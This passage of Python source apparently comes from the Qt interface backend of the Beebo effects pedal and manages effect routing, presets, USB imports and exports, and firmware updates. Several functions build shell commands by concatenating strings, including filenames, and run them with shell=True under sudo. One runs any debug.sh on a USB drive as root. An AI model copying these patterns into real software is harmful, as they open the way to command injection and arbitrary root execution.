port_connections[current_source_port]:\n port_connections[current_source_port].append([t_effect, t_port])\n\n # debug_print(\"port_connections is\", port_connections)\n # global context\n context.setContextProperty(\"portConnections\", port_connections)\n update_counter.value+=1\n\n\ndef from_backend_disconnect(head, tail):\n # debug_print(\"head \", head, \"tail\", tail)\n current_source_port = head\n try:\n if current_source_port.rsplit(\"/\", 1)[0] in sub_graphs:\n s_effect = current_source_port\n s_effect_type = current_effects[s_effect][\"effect_type\"]\n if s_effect_type in bare_output_ports:\n s_port = \"input\"\n elif s_effect_type in bare_input_ports:\n s_port = \"output\"\n current_source_port = s_effect + \"/\" + s_port\n\n effect_id_port_name = tail.rsplit(\"/\", 1)\n if effect_id_port_name[0] in sub_graphs:\n t_effect = tail\n t_effect_type = current_effects[t_effect][\"effect_type\"]\n if t_effect_type in bare_output_ports:\n t_port = \"input\"\n elif t_effect_type in bare_input_ports:\n t_port = \"output\"\n else:\n t_effect, t_port = effect_id_port_name\n except KeyError:\n return\n\n # debug_print(\"before port_connections is\", port_connections)\n if current_source_port in port_connections and [t_effect, t_port] in port_connections[current_source_port]:\n port_connections[current_source_port].pop(port_connections[current_source_port].index([t_effect, t_port]))\n # debug_print(\"after port_connections is\", port_connections)\n # global context\n context.setContextProperty(\"portConnections\", port_connections)\n update_counter.value+=1\n\ndef get_meta_from_files(initial=False):\n r_dict = {}\n def get_rdf_element_from_files(rdf_name=\"rdfs:comment\", element_name=\"description\"):\n command = 'grep -ir \"'+ rdf_name +'\" /mnt/presets'\n # command = ['grep' , '-ir', '\"'+ element_name +'\"', '/mnt/presets']\n ret_obj = subprocess.run(command, capture_output=True, shell=True)\n for a in ret_obj.stdout.splitlines():\n try:\n b = a.decode().split(\":\", 1)\n v = b[1].split('\"')[1]\n preset_name = b[0].rsplit(\"/\", 1)[0]\n if preset_name not in r_dict:\n r_dict[preset_name] = {}\n r_dict[preset_name][element_name] = v\n except:\n pass\n get_rdf_element_from_files(\"rdfs:comment\", \"description\")\n get_rdf_element_from_files(\"doap:maintainer\", \"author\")\n get_rdf_element_from_files(\"doap:category\", \"tags\")\n global preset_meta_data\n preset_meta_data = r_dict\n # flush to file\n write_preset_meta_cache(initial)\n\ndef du(path):\n \"\"\"disk usage in human readable format (e.g. '2,1GB')\"\"\"\n return subprocess.check_output(['du','-sh', path]).split()[0].decode('utf-8')\n\nclass Knobs(QObject, metaclass=properties.PropertyMeta):\n spotlight_entries = properties.Property(list)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.spotlight_entries = []\n # type(self).__dict__[\"spotlight_entries\"].setter(self, [])\n\n @Slot(bool, str, str)\n def set_current_port(self, is_source, effect_id, port_name):\n # debug_print(\"port name is\", port_name, \"effect id\", effect_id)\n # if source highlight targets\n if is_source:\n # set current source port\n # effect_id, port_name\n # highlight effects given source port\n global current_source_port\n current_source_port = \"/\".join((effect_id, port_name))\n connect_source_port.name = current_source_port\n else:\n # add connection between source and target\n # or just wait until it's automatically created from engine? \n # if current_source_port not in port_connections:\n # port_connections[current_source_port] = []\n # if [effect_id, port_name] not in port_connections[current_source_port]:\n # port_connections[current_source_port].append([effect_id, port_name])\n\n\n s_effect, s_port = current_source_port.rsplit(\"/\", 1)\n s_effect_type = current_effects[s_effect][\"effect_type\"]\n t_effect_type = current_effects[effect_id][\"effect_type\"]\n if t_effect_type in bare_ports:\n if s_effect_type in bare_ports:\n ingen_wrapper.connect_port(s_effect, effect_id)\n else:\n ingen_wrapper.connect_port(current_source_port, effect_id)\n else:\n if s_effect_type in bare_ports:\n ingen_wrapper.connect_port(s_effect, effect_id+\"/\"+port_name)\n else:\n ingen_wrapper.connect_port(current_source_port, effect_id+\"/\"+port_name)\n\n\n # if [effect_id, port_name] not in inv_port_connections:\n # inv_port_connections[[effect_id, port_name]] = []\n # if current_source_port not in inv_port_connections[[effect_id, port_name]]:\n # inv_port_connections[[effect_id, port_name]].append(current_source_port)\n\n # debug_print(\"port_connections is\", port_connections)\n # global context\n # context.setContextProperty(\"portConnections\", port_connections)\n\n\n @Slot(bool, str, bool)\n def select_effect(self, is_source, effect_id, interconnect=False):\n restrict_port_types = not interconnect\n effect_type = current_effects[effect_id][\"effect_type\"]\n # debug_print(\"selecting effect type\", effect_type, is_source, \"interconnect is \", interconnect)\n if is_source:\n ports = sorted([v[1]+'|'+v[0]+'|'+k for k,v in effect_prototypes[effect_type][\"outputs\"].items()])\n selected_source_effect_ports.setStringList(ports)\n else:\n\n s_effect_id, s_port = connect_source_port.name.rsplit(\"/\", 1)\n source_port_type = effect_prototypes[current_effects[s_effect_id][\"effect_type\"]][\"outputs\"][s_port][1]\n # if hector, if source is an physical input or output is a physical output, \n # disable restrict_port_types\n if current_pedal_model.name == \"hector\":\n if effect_type in [\"output\", \"midi_output\"] or current_effects[s_effect_id][\"effect_type\"] in [\"input\", \"midi_input\"]:\n restrict_port_types = False\n\n if restrict_port_types or source_port_type == \"AtomPort\":\n ports = sorted([v[1]+'|'+v[0]+'|'+k for k,v in effect_prototypes[effect_type][\"inputs\"].items() if v[1] == source_port_type])\n else:\n ports = sorted([v[1]+'|'+v[0]+'|'+k for k,v in effect_prototypes[effect_type][\"inputs\"].items() if (v[1] not in [\"AtomPort\", \"ControlPort\"])])\n\n # debug_print(\"ports is \", ports)\n selected_dest_effect_ports.setStringList(ports)\n\n @Slot(str)\n def list_connected(self, effect_id):\n ports = []\n for source_port, connected in port_connections.items():\n s_effect, s_port = source_port.rsplit(\"/\", 1)\n display_s_port = effect_prototypes[current_effects[s_effect][\"effect_type\"]][\"inputs\"][s_port][0]\n # connections where we are target\n for c_effect, c_port in connected:\n display_c_port = effect_prototypes[current_effects[c_effect][\"effect_type\"]][\"outputs\"][c_port][0]\n if c_effect == effect_id:\n ports.append(\"output===\"+display_c_port+\" connected to \"+s_effect.rsplit(\"/\", 1)[1]+\" \"+ display_s_port +\"===\"+s_effect+\"/\"+s_port+\"---\"+c_effect+\"/\"+c_port)\n elif s_effect == effect_id:\n ports.append(\"input===\"+c_effect.rsplit(\"/\", 1)[1]+ \" \"+display_c_port+\" connected to \"+display_s_port+\"===\"+s_effect+\"/\"+s_port+\"---\"+c_effect+\"/\"+c_port)\n # debug_print(\"connected ports:\", ports, effect_id)\n # qWarning(\"connected Ports \"+ str(ports) + \" \" + effect_id)\n ports.sort()\n selected_source_effect_ports.setStringList(ports)\n\n @Slot(str, str)\n def disconnect_port(self, port_pair, original_item):\n ports_list = [v for v in selected_source_effect_ports.stringList() if v != original_item]\n selected_source_effect_ports.setStringList(ports_list)\n\n target_pair, source_pair = port_pair.split(\"---\")\n t_effect, t_port = target_pair.rsplit(\"/\", 1)\n # debug_print(\"### disconnect, port pair\", port_pair)\n\n s_effect, s_port = source_pair.rsplit(\"/\", 1)\n s_effect_type = current_effects[s_effect][\"effect_type\"]\n t_effect_type = current_effects[t_effect][\"effect_type\"]\n if t_effect_type in bare_ports:\n if s_effect_type in bare_ports:\n ingen_wrapper.disconnect_port(s_effect, t_effect)\n else:\n ingen_wrapper.disconnect_port(source_pair, t_effect)\n else:\n if s_effect_type in bare_ports:\n ingen_wrapper.disconnect_port(s_effect, target_pair)\n else:\n ingen_wrapper.disconnect_port(source_pair, target_pair)\n\n @Slot(str)\n def add_new_effect(self, effect_type):\n # calls backend to add effect\n global seq_num\n seq_num = seq_num + 1\n debug_print(\"add new effect\", effect_type)\n # if there's existing effects of this type, increment the ID\n is_bare_port = effect_type in bare_ports\n num_sep = \"\"\n if is_bare_port:\n num_sep = \"_\"\n\n effect_name = current_sub_graph+effect_type+num_sep+str(1)\n for i in range(1, 1000):\n if current_sub_graph+effect_type+num_sep+str(i) not in current_effects:\n effect_name = current_sub_graph+effect_type+num_sep+str(i)\n break\n\n if is_bare_port:\n # debug_print(\"new effect si bare port\")\n bare_ports_map = {\"input\" : \"in\", \"output\" : \"out\", \"midi_input\" : \"midi_in\",\n \"midi_output\" : \"midi_out\", \"loop_common_in\" : \"out\",\n \"loop_common_out\" : \"in\",\n \"loop_extra_midi\": \"midi_out\", \"loop_midi_out\": \"midi_in\"}\n if bare_ports_map[effect_type] == \"in\":\n ingen_wrapper.add_input(effect_name, 900, 150)\n elif bare_ports_map[effect_type] == \"out\":\n ingen_wrapper.add_output(effect_name, 900, 150)\n elif effect_type == \"loop_extra_midi\":\n ingen_wrapper.add_loop_extra_midi(effect_name, 900, 150)\n elif effect_type == \"loop_midi_out\":\n ingen_wrapper.add_loop_midi_out(effect_name, 900, 150)\n # ingen_wrapper.add_input(\"/main/in_\"+str(i), x=1192, y=(80*i))\n else:\n ingen_wrapper.add_plugin(effect_name, effect_type_map[effect_type])\n # from_backend_new_effect(effect_name, effect_type)\n\n\n @Slot(str, bool)\n def set_bypass(self, effect_name, is_active):\n # check if were kill dry, if so, set enabled value, else just call default ingen:enabled\n effect_type = current_effects[effect_name][\"effect_type\"]\n if \"kill_dry\" in effect_prototypes[effect_type]:\n v = 1.0 - (current_effects[effect_name][\"controls\"][\"enabled\"].value)\n knobs.ui_knob_change(effect_name, \"enabled\", v)\n current_effects[effect_name][\"enabled\"].value = bool(v)\n else:\n ingen_wrapper.set_bypass(effect_name, is_active)\n\n @Slot(str)\n def set_description(self, description):\n ingen_wrapper.set_description(current_sub_graph.rstrip(\"/\"), description)\n preset_description.name = description\n\n @Slot(str, int, int)\n def move_effect(self, effect_name, x, y):\n try:\n current_effects[effect_name][\"x\"] = x\n current_effects[effect_name][\"y\"] = y\n except KeyError:\n pass\n ingen_wrapper.set_plugin_position(effect_name, x, y)\n\n @Slot(str)\n def remove_effect(self, effect_id):\n # calls backend to remove effect\n # debug_print(\"remove effect\", effect_id)\n # if effect is loopler we need to just hide it instead, because otherwise Ingen crashes\n if effect_id in current_effects and current_effects[effect_id][\"effect_type\"] in loopler_modules:\n # find all connections and remove them, disconnect plugin doesn't work\n for source_port, targets in list(port_connections.items()):\n # target_pair, source_pair = port_pair.split(\"---\")\n s_effect, s_port = source_port.rsplit(\"/\", 1)\n if s_effect == effect_id:\n for e, p in port_connections[source_port]:\n knobs.disconnect_port(source_port + \"---\" + \"/\".join([e, p]), False )\n else:\n for e, p in port_connections[source_port]:\n if e == effect_id:\n knobs.disconnect_port(\"/\".join([e, p]) + \"---\" + source_port, False)\n from_backend_remove_effect(effect_id)\n # ingen_wrapper.remove_plugin(effect_id)\n else:\n ingen_wrapper.remove_plugin(effect_id)\n\n @Slot(str, str, 'double')\n def ui_knob_change(self, effect_name, parameter, value):\n # debug_print(x, y, z)\n if (effect_name in current_effects) and (parameter in current_effects[effect_name][\"controls\"]):\n current_effects[effect_name][\"controls\"][parameter].value = value\n # clamping here to make it a bit more obvious\n value = clamp(value, current_effects[effect_name][\"controls\"][parameter].rmin, current_effects[effect_name][\"controls\"][parameter].rmax)\n # bit sketch but check if BPM here? XXX\n if parameter == \"bpm\":\n set_bpm(value)\n\n ingen_wrapper.set_parameter_value(effect_name+\"/\"+parameter, value)\n else:\n debug_print(\"effect not found\", effect_name, parameter, value, effect_name in current_effects)\n\n @Slot(str, str, bool)\n def ui_knob_inc(self, effect_name, parameter, is_inc=True):\n if (effect_name in current_effects) and (parameter in current_effects[effect_name][\"controls\"]):\n v = current_effects[effect_name][\"controls\"][parameter].value\n change = abs(v / 10.0)\n if change < 0.01:\n change = 0.01\n\n if is_inc:\n v = v + change\n else:\n v = v - change\n # clamping here to make it a bit more obvious\n v = clamp(v, current_effects[effect_name][\"controls\"][parameter].rmin, current_effects[effect_name][\"controls\"][parameter].rmax)\n # bit sketch but check if BPM here? XXX\n if parameter == \"bpm\":\n set_bpm(v)\n\n current_effects[effect_name][\"controls\"][parameter].value = v\n ingen_wrapper.set_parameter_value(effect_name+\"/\"+parameter, v)\n else:\n debug_print(\"effect not found\", effect_name, parameter, v, effect_name in current_effects)\n\n @Slot(str, str)\n def update_ir(self, effect_id, ir_file):\n is_cab = True\n prefix=\"file://\"\n effect_type = current_effects[effect_id][\"effect_type\"]\n if effect_type in [\"mono_reverb\", \"stereo_reverb\", \"quad_ir_reverb\"]:\n is_cab = False\n\n if \"file://\" in ir_file:\n prefix=''\n\n current_effects[effect_id][\"controls\"][\"ir\"].name = ir_file\n # ir_browser_model_s.external_ir_set(ir_file)\n # print(\"#### file\", ir_file, \"prefix\", prefix)\n ingen_wrapper.set_file(effect_id, prefix+ir_file, is_cab)\n\n @Slot(str, str)\n def update_json(self, effect_id, ir_file):\n effect_type = current_effects[effect_id][\"effect_type\"]\n current_effects[effect_id][\"controls\"][\"ir\"].name = ir_file\n if effect_type == \"amp_rtneural\":\n ingen_wrapper.set_json(effect_id, ir_file)\n else:\n ingen_wrapper.set_json_nam(effect_id, ir_file)\n\n @Slot()\n def ui_load_empty_preset(self, force=False):\n if force:\n # load_preset(\"file:///mnt/presets/beebo/Empty.ingen/main.ttl\", True)\n knobs.ui_load_qa_preset_by_name(\"file:///mnt/presets/beebo/Empty.ingen\")\n else:\n knobs.ui_load_preset_by_name(\"file:///mnt/presets/beebo/Empty.ingen\")\n\n\n @Slot(str)\n def ui_load_preset_by_name(self, preset_file):\n if is_loading.value == True:\n return\n\n patch_bay_notify.loading_preset.emit(True)\n # debug_print(\"loading\", preset_file)\n # outfile = preset_file[7:] # strip file:// prefix\n load_preset(preset_file+\"/main.ttl\")\n current_preset.name = preset_file.strip(\"/\").split(\"/\")[-1][:-6]\n global current_preset_filename\n global previous_preset_filename\n previous_preset_filename = current_preset_filename\n current_preset_filename = preset_file[7:]\n update_counter.value+=1\n\n @Slot(str)\n def ui_load_qa_preset_by_name(self, preset_file):\n if is_loading.value == True:\n return\n\n # debug_print(\"loading\", preset_file)\n # outfile = preset_file[7:] # strip file:// prefix\n load_preset(preset_file+\"/main.ttl\")\n current_preset.name = preset_file.strip(\"/\").split(\"/\")[-1][:-6]\n global current_preset_filename\n global previous_preset_filename\n previous_preset_filename = current_preset_filename\n current_preset_filename = preset_file[7:]\n update_counter.value+=1\n\n @Slot(str)\n def ui_save_pedalboard(self, pedalboard_name):\n # debug_print(\"saving\", preset_name)\n # TODO add folders\n if pedalboard_name.lower() == 'empty':\n return\n\n current_preset.name = pedalboard_name\n ingen_wrapper.set_author(current_sub_graph.rstrip(\"/\"), pedal_state[\"author\"])\n ingen_wrapper.save_pedalboard(\"beebo\", pedalboard_name, current_sub_graph.rstrip(\"/\"))\n self.launch_task(2, os.sync) # wait 2 seconds then sync to drive\n # update preset meta\n clean_filename = ingen_wrapper.get_valid_filename(pedalboard_name)\n if len(clean_filename) > 0:\n filename = \"/mnt/presets/beebo/\"+clean_filename+\".ingen\"\n global current_preset_filename\n global previous_preset_filename\n previous_preset_filename = current_preset_filename\n current_preset_filename = filename\n if filename in preset_meta_data:\n preset_meta_data[filename][\"author\"] = pedal_state[\"author\"]\n preset_meta_data[filename][\"description\"] = preset_description.name\n else:\n preset_meta_data[filename] = {\"author\": pedal_state[\"author\"], \"description\": preset_description.name}\n\n # check if loopler in use\n if loopler_in_use():\n # print(\"looper in use\", looper_in_use())\n loopler_file = filename + \"/loopler.slsess\"\n Path(filename).mkdir(parents=True, exist_ok=True)\n loopler.save_session(loopler_file)\n loopler_midi_file = filename + \"/loopler.slb\"\n loopler.save_midi_bindings(loopler_midi_file)\n else:\n # print(\"looper not in use\")\n loopler_file = filename + \"/loopler.slsess\"\n loopler_midi_file = filename + \"/loopler.slb\"\n # we detect loopler presence by the file, so delete it if it is preset and not enabled\n if os.path.exists(loopler_file):\n os.remove(loopler_file)\n if os.path.exists(loopler_midi_file):\n os.remove(loopler_midi_file)\n\n\n # flush to file\n write_preset_meta_cache()\n\n @Slot(str)\n def toggle_favourite(self, preset_file):\n # print(\"toggling fav\")\n p_f = preset_file[7:]\n if p_f in favourites[\"presets\"]:\n favourites[\"presets\"].pop(p_f)\n elif p_f in preset_meta_data:\n favourites[\"presets\"][p_f] = True\n else:\n return\n context.setContextProperty(\"favourites\", favourites)\n # flush to file\n write_favourites_data()\n preset_browser_model_s.add_filter()\n\n @Slot(str)\n def toggle_module_favourite(self, effect_type):\n # print(\"toggling fav\")\n if effect_type in favourites[\"modules\"]:\n favourites[\"modules\"].pop(effect_type)\n else:\n favourites[\"modules\"][effect_type] = True\n context.setContextProperty(\"favourites\", favourites)\n # flush to file\n write_favourites_data()\n module_browser_model_s.add_filter()\n\n @Slot()\n def ui_copy_irs(self):\n # debug_print(\"copy irs from USB\")\n # could convert any that aren't 48khz.\n # instead we just only copy ones that are\n # remount RW \n # copy all wavs in /usb/reverbs and /usr/cabs to /audio/reverbs and /audio/cabs\n # remount RO \n command = \"\"\" sudo mount -o remount,rw /dev/mmcblk0p2 /mnt; if [ -d /usb_flash/reverbs ]; then cd /usb_flash/reverbs; rename 's/[^a-zA-Z0-9. _-]/_/g' **; find . -iname \"*.wav\" -type f -exec sh -c 'test $(soxi -r \"$0\") = \"48000\"' {} \\; -print0 | xargs -0 cp --target-directory=/mnt/audio/reverbs --parents; fi;\n if [ -d /usb_flash/cabs ]; then cd /usb_flash/cabs; rename 's/[^a-zA-Z0-9. _-]/_/g' **; find . -iname \"*.wav\" -type f -exec sh -c 'test $(soxi -r \"$0\") = \"48000\"' {} \\; -print0 | xargs -0 cp --target-directory=/mnt/audio/cabs --parents; fi; sudo mount -o remount,ro /dev/mmcblk0p2 /mnt;\"\"\"\n command_status[0].value = -1\n self.launch_subprocess(command, after=ir_browser_model.combine_metadata)\n\n @Slot()\n def ui_copy_amps(self):\n # remount RW \n # copy all zips in /usb_flash/amps to /mnt/audio/amp_nam\n # remount RO \n command = \"\"\" sudo mount -o remount,rw /dev/mmcblk0p2 /mnt;\n if [ -d /usb_flash/amps ]; then\n cd /usb_flash/amps; rename 's/[^a-zA-Z0-9. _-]/_/g' **;\n find . -iname \"*.zip\" -type f -print0 | xargs -0 cp --target-directory=/mnt/audio/amp_nam --parents;\n cd /mnt/audio/amp_nam/;\n find . -iname \"*.zip\" -type f -print0 | xargs -0 -n1 unzip;\n find . -iname \"*.zip\" -type f -print0 | xargs -0 rm;\n fi;\n sudo mount -o remount,ro /dev/mmcblk0p2 /mnt;\"\"\"\n command_status[0].value = -1\n\n self.launch_subprocess(command, after=amp_browser_model_s.external_update_reset)\n\n @Slot(str, result=str)\n def ui_usb_folder_size(self, folder):\n # return how large a USB folder is in mb, just du the folder, will give us an approx idea of what will be copied\n try:\n return du(folder)\n except:\n return \"Folder not found\"\n\n @Slot(result=str)\n def remaining_user_storage(self):\n # return how much space in mb is available\n return subprocess.check_output(['df','-h', '--output=avail', '/dev/mmcblk0p2']).split()[1].decode('utf-8')\n\n @Slot(result=str)\n def usb_information_text(self):\n # return how much space in mb is available\n return f\"\"\"

USB info

\n

Cabs: {self.ui_usb_folder_size(\"/usb_flash/cabs\")}

\n

Reverbs: {self.ui_usb_folder_size(\"/usb_flash/reverbs\")}

\n

Amps: {self.ui_usb_folder_size(\"/usb_flash/amps\")}

\n

Remaining user storage

\n

{self.remaining_user_storage()}

\n \"\"\"\n\n @Slot()\n def import_presets(self):\n # debug_print(\"copy presets from USB\")\n # could convert any that aren't 48khz.\n # instead we just only copy ones that are\n command = \"\"\"cd /usb_flash/presets;\n if test -n \"$(find /usb_flash/presets/ -maxdepth 1 -name '*.ingen' -print -quit)\";\n then find . -iname \"*.ingen\" -type d -print0 | xargs -0 cp -r --target-directory=/mnt/presets --parents;\n fi\n if test -n \"$(find /usb_flash/presets/ -maxdepth 1 -name '*.instr' -print -quit)\";\n then cd /mnt/presets;\n find /usb_flash/presets/ -iname \"*.instr\" -type f -exec tar -xjf {} \\; ;\n fi\n find /mnt/presets/digit/ -iname '*.ingen' -type d -exec mv -t /mnt/presets/beebo/ {} + ;\n rm -rf /mnt/presets/digit/*\"\"\"\n command_status[0].value = -1\n self.launch_subprocess(command, after=get_meta_from_files)\n # after presets have copied we need to parse all the tags / author and update cache\n\n @Slot()\n def export_presets(self):\n # debug_print(\"copy presets to USB\")\n # export as tar.bz2\n # \n command = \"\"\"cd /mnt/presets; mkdir -p /usb_flash/presets; find . -iname \"*.ingen\" -type d -exec bash -c 'tar -cjf /usb_flash/presets/$(basename \"$@\" .ingen).instr $@' _ {} \\; ;sudo umount /usb_flash\"\"\"\n command_status[0].value = -1\n self.launch_subprocess(command)\n\n @Slot()\n def export_current_preset(self):\n # debug_print(\"copy current preset to USB\")\n i = current_preset_filename.find(\"presets\")+len(\"presets\")+1\n out_file = current_preset_filename[i:] # strip starting folders\n command = \"\"\"cd /mnt/presets; mkdir -p /usb_flash/presets; tar -cjf /usb_flash/presets/\"\"\"+out_file.split(\"/\")[1][:-len(\".ingen\")]+\".instr \" + out_file +\"\"\" ;sudo umount /usb_flash\"\"\"\n command_status[0].value = -1\n self.launch_subprocess(command)\n\n @Slot()\n def copy_logs(self):\n # debug_print(\"copy presets to USB\")\n # could convert any that aren't 48khz.\n # instead we just only copy ones that are\n command = \"\"\"mkdir -p /usb_flash/logs; sudo cp /var/log/syslog /usb_flash/logs/;sudo umount /usb_flash\"\"\"\n command_status[0].value = -1\n self.launch_subprocess(command)\n\n @Slot()\n def ui_shutdown(self):\n ret_obj = subprocess.run(\"shutdown -h 'now'\", shell=True)\n\n @Slot()\n def ui_update_firmware(self):\n # debug_print(\"Updating firmware\")\n # dpkg the debs in the folder\n # report if files can't be found, see if no usb drive is found, or if it's incompatible.\n # clear preset to save CPU\n self.ui_load_empty_preset(True)\n # if the drive can't be remounted RW then auto repair the drive and restart\n # /sbin/e2fsck -fy /dev/mmcblk0p1\n command_status[0].name = \"Firmware update failed. The files were found, the flash drive appears to work but something else happened, please contact us. info@polyeffects.com Extra debugging info:\"\n if len(glob.glob(\"/usb_flash/*.deb\")) > 0:\n command = \"\"\"sudo /usr/bin/polyoverlayroot-chroot dpkg -i -E -G /usb_flash/*.deb && sync && sudo shutdown -h 'now'\"\"\"\n # sync then sleep before shutdown\n command_status[0].value = -1\n self.launch_subprocess(command)\n else:\n # no files found, is there a usb drive?\n if os.path.exists(\"/dev/sda2\"):\n command_status[0].name = \"\"\"Firmware update failed. There's a USB drive inserted but it's got more partitions than we expect...\nyou'll need to flash the usb flash drive to a format that works for Beebo, please follow the instructions on the website\"\"\"\n elif os.path.exists(\"/dev/sda1\"):\n # usb drive found, no files\n command_status[0].name = \"\"\"Firmware update failed. There's a USB drive inserted but it doesn't have the files unzipped directly on the drive.\nPlease unzip the update and copy it directly to the drive. If that doesn't work, please contact info@polyeffects.com\"\"\"\n elif os.path.exists(\"/dev/sda\"):\n command_status[0].name = \"\"\"Firmware update failed. There's a USB drive inserted but it doesn't have any partitions on it...\nyou'll need to flash the usb flash drive to a format that works for Beebo, please follow the instructions on the website\"\"\"\n else:\n command_status[0].name = \"\"\"Firmware update failed. No USB drive found. If you've got another one please try that. If that doesn't work please contact us, info@polyeffecs.com\"\"\"\n\n # \n command_status[0].value = 1\n\n @Slot()\n def ui_run_debug(self):\n if len(glob.glob(\"/usb_flash/*.sh\")) > 0:\n command = \"\"\"sudo /bin/bash /usb_flash/debug.sh\"\"\"\n command_status[0].value = -1\n self.launch_subprocess(command)\n else:\n command_status[0].value = 1\n\n\n @Slot(int)\n def set_input_level(self, level, write=True):\n debug_print(\"setting input_level, \", level, input_level.value)\n if IS_REMOTE_TEST:\n return\n command = \"amixer -- sset ADC1 \"+str(level)+\"db; amixer -- sset ADC2 \"+str(level)+\"db; amixer -- sset ADC3 \"+str(level)+\"db\"\n command_status[0].value = subprocess.call(command, shell=True)\n if hardware_info[\"revision\"] < 10 and pedal_state[\"model\"] != \"hector\":\n command = \"amixer -- sset 'ADC1 Invert' off,on; amixer -- sset 'ADC2 Invert' on,on\"\n elif pedal_state[\"model\"] == \"hector\":\n command = (\"amixer -- sset 'ADC1 Invert' on,on; amixer -- sset 'ADC2 Invert' on,on; amixer -- sset 'ADC3 Invert' on,on; \"\n \"amixer -- sset 'DAC1 Invert' on,on; amixer -- sset 'DAC2 Invert' on,on; amixer -- sset 'DAC3 Invert' on,on; amixer -- sset 'DAC4 Invert' on,on;\")\n else:\n command = \"amixer -- sset 'ADC1 Invert' on,on; amixer -- sset 'ADC2 Invert' on,on\"\n\n command_status[0].value = subprocess.call(command, shell=True)\n input_level.value = level\n if write:\n pedal_state[\"input_level\"] = level\n write_pedal_state()\n\n @Slot(int)\n def set_channel(self, channel):\n # debug_print(\"setting channel, \", channel, midi_channel.value)\n midi_channel.value = channel\n pedal_state[\"midi_channel\"] = midi_channel.value\n write_pedal_state()\n\n @Slot(bool)\n def set_enc_invert(self, invert):\n pedal_state[\"invert_enc\"] = invert\n context.setContextProperty(\"pedalState\", pedal_state)\n write_pedal_state()\n\n @Slot(bool)\n def set_l_to_r(self, l_to_r):\n pedal_state[\"l_to_r\"] = l_to_r\n context.setContextProperty(\"pedalState\", pedal_state)\n is_l_to_r.value = l_to_r\n write_pedal_state()\n\n @Slot(bool)\n def set_d_is_tuner(self, d_is_tuner):\n pedal_state[\"d_is_tuner\"] = d_is_tuner\n context.setContextProperty(\"pedalState\", pedal_state)\n write_pedal_state()\n\n @Slot(bool)\n def set_thru_enabled(self, thru_on):\n pedal_state[\"thru\"] = thru_on\n context.setContextProperty(\"pedalState\", pedal_state)\n write_pedal_state()\n try:\n if thru_on:\n command = [\"/usr/bin/jack_connect\", \"ttymidi:MIDI_in\", \"ttymidi:MIDI_out\"]\n ret_var = subprocess.run(command)\n else:\n command = [\"/usr/bin/jack_disconnect\", \"ttymidi:MIDI_in\", \"ttymidi:MIDI_out\"]\n ret_var = subprocess.run(command)\n except:\n pass\n\n @Slot()\n def flip_screen(self):\n if \"screen_flipped\" in pedal_state:\n pedal_state[\"screen_flipped\"] = not pedal_state[\"screen_flipped\"]\n else:\n pedal_state[\"screen_flipped\"] = True\n context.setContextProperty(\"pedalState\", pedal_state)\n write_pedal_state()\n\n @Slot(int)\n def set_preset_list_length(self, v):\n if v > len(preset_list_model.stringList()):\n # debug_print(\"inserting new row in preset list\", v)\n insert_row(preset_list_model, \"file:///mnt/presets/beebo/Default_Preset.ingen\")\n else:\n # debug_print(\"removing row in preset list\", v)\n preset_list_model.removeRows(v, 1)\n\n @Slot(int, str)\n def map_preset(self, v, name):\n preset_list_model.setData(preset_list_model.index(v), name)\n\n @Slot()\n def save_preset_list(self):\n # debug_print(\"saving preset list\")\n with open(\"/mnt/pedal_state/beebo_preset_list.json\", \"w\") as f:\n json.dump(preset_list_model.stringList(), f)\n os.sync()\n\n @Slot()\n def reset_preset_list(self):\n preset_list = [\"file:///mnt/presets/beebo/Empty.ingen\"]\n preset_list_model.setStringList(preset_list)\n self.save_preset_list()\n\n @Slot(int)\n def on_worker_done(self, ret_var):\n # debug_print(\"updating UI\")\n command_status[0].value = ret_var\n\n @Slot(str)\n def on_worker_done_output(self, ret_var):\n # debug_print(\"updating UI\")\n command_status[1].name = ret_var\n\n @Slot(int)\n def on_task_done(self, ret_var):\n # debug_print(\"updating UI\")\n command_status[0].value = ret_var\n\n def launch_subprocess(self, command, after=None):\n # debug_print(\"launch_threadpool\")\n worker = MyWorker(command, after)\n worker.emitter.done.connect(self.on_worker_done)\n worker.emitter.stdout.connect(self.on_worker_done_output)\n worker_pool.start(worker)\n\n def launch_task(self, delay, command):\n # debug_print(\"launch_threadpool\")\n worker = MyTask(delay, command)\n # worker.emitter.done.connect(self.on_worker_done)\n worker_pool.start(worker)\n\n @Slot(str, str)\n def set_knob_current_effect(self, effect_id, parameter):\n # get current value and update encoder / cache.\n # qDebug(\"setting knob current effect\" + parameter)\n knob = \"left\"\n if not (knob_map[knob].effect == effect_id and knob_map[knob].parameter == parameter):\n knob_map[knob].effect = effect_id\n knob_map[knob].parameter = parameter\n knob_map[knob].rmin = current_effects[effect_id][\"controls\"][parameter].rmin\n knob_map[knob].rmax = current_effects[effect_id][\"controls\"][parameter].rmax\n knob_map[knob].is_loopler = False\n\n @Slot()\n def clear_knob_effect(self):\n # get current value and update encoder / cache.\n # qDebug(\"setting knob current effect\" + parameter)\n knob = \"left\"\n knob_map[knob].effect = \"\"\n knob_map[knob].parameter = \"\"\n knob_map[knob].rmin = 0\n knob_map[knob].rmax = 1\n knob_map[knob].is_loopler = False\n\n @Slot(str, int, str, float, float)\n def set_loopler_knob(self, effect_id, loop_index, parameter, rmin, rmax):\n # get current value and update encoder / cache.\n # qDebug(\"setting knob current effect\" + parameter)\n knob = \"left\"\n if not (knob_map[knob].effect == effect_id and knob_map[knob].parameter == parameter and\n knob_map[knob].loop_index == loop_index):\n knob_map[knob].effect = effect_id\n knob_map[knob].parameter = parameter\n knob_map[knob].rmin = rmin\n knob_map[knob].rmax = rmax\n knob_map[knob].is_loopler = True\n knob_map[knob].loop_index = loop_index\n\n @Slot(str)\n def set_pedal_model(self, pedal_model):\n if is_loading.value == True:\n return\n pedal_state[\"model\"] = pedal_model\n write_pedal_state()\n change_pedal_model(pedal_model)\n\n @Slot(str)\n def delete_ir(self, ir):\n # debug_print(\"delete: ir files is \", ir)\n ir = ir[len(\"file://\"):]\n # can be a directory or file\n # check if it isn't a base dir. \n if \"imported\" not in ir or ir in [\"/audio/cabs/imported\", \"/audio/reverbs/imported\"]:\n return\n # delete\n # remount as RW\n command = \"sudo mount -o remount,rw /dev/mmcblk0p2 /mnt\"\n ret_var = subprocess.call(command, shell=True)\n try:\n os.remove(ir)\n except IsADirectoryError:\n shutil.rmtree(ir)\n os.sync()\n # remount as RO\n command = \"sudo mount -o remount,ro /dev/mmcblk0p2 /mnt\"\n ret_var = subprocess.call(command, shell=True)\n\n @Slot()\n def delete_all_irs(self):\n # debug_print(\"delete: ir files is \", ir)\n # can be a directory or file\n # check if it isn't a base dir. \n # delete\n # remount as RW\n command = \"sudo mount -o remount,rw 